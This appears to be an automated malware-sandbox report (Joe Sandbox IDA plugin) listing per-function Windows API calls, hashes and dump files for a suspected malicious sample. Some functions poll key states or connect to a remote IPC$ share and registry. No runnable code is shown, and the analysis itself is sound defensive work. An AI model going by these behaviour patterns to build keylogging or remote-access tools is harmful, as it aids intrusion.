                                                                        • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                        • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                        • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                        APIs
                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                        • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                        • _memmove.LIBCMT ref: 00467EB8
                                                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                        • _memmove.LIBCMT ref: 00467F6C
                                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                        • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                        • String ID:
                                                                        • API String ID: 2170234536-0
                                                                        • Opcode ID: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
                                                                        • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                        • Opcode Fuzzy Hash: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
                                                                        • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                        • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                        • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                        • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                        • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                        • GetKeyState.USER32(00000012), ref: 00453E26
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                        • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                        • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                        • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                        • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                        • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                        • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                        • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                        • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                        • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                        • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                        • String ID:
                                                                        • API String ID: 3096461208-0
                                                                        • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                        • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                        • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                        • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                        • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                        • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                        • DeleteObject.GDI32(?), ref: 0047151E
                                                                        • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                        • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                        • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                        • DeleteObject.GDI32(?), ref: 004715EA
                                                                        • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                        • String ID:
                                                                        • API String ID: 3218148540-0
                                                                        • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                        • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                        • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                        • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                        • String ID:
                                                                        • API String ID: 136442275-0
                                                                        • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                        • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                        • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                        • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                        APIs
                                                                        • _wcsncpy.LIBCMT ref: 00467490
                                                                        • _wcsncpy.LIBCMT ref: 004674BC
                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                        • _wcstok.LIBCMT ref: 004674FF
                                                                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                        • _wcstok.LIBCMT ref: 004675B2
                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                        • _wcslen.LIBCMT ref: 00467793
                                                                        • _wcscpy.LIBCMT ref: 00467641
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        • _wcslen.LIBCMT ref: 004677BD
                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                        • String ID: X
                                                                        • API String ID: 3104067586-3081909835
                                                                        • Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                        • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                        • Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                        • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                        • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                        • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                        • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                        • _wcslen.LIBCMT ref: 0046CDB0
                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                        • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                        • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                          • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                          • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                          • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                        Strings
                                                                        • NULL Pointer assignment, xrefs: 0046CEA6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                        • String ID: NULL Pointer assignment
                                                                        • API String ID: 440038798-2785691316
                                                                        • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                        • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                        • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                        • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                        APIs
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                        • _wcslen.LIBCMT ref: 004610A3
                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                        • GetWindowRect.USER32(?,?), ref: 00461248
                                                                          • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                        • String ID: ThumbnailClass
                                                                        • API String ID: 4136854206-1241985126
                                                                        • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                        • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                        • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                        • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                        APIs
                                                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                        • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                        • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                        • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                        • String ID: 2
                                                                        • API String ID: 1331449709-450215437
                                                                        • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                        • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                        • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                        • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                        • __swprintf.LIBCMT ref: 00460915
                                                                        • __swprintf.LIBCMT ref: 0046092D
                                                                        • _wprintf.LIBCMT ref: 004609E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                        • API String ID: 3054410614-2561132961
                                                                        • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                        • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                        • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                        • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                        APIs
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                        • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                        • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                        • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                        • API String ID: 600699880-22481851
                                                                        • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                        • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                        • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                        • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
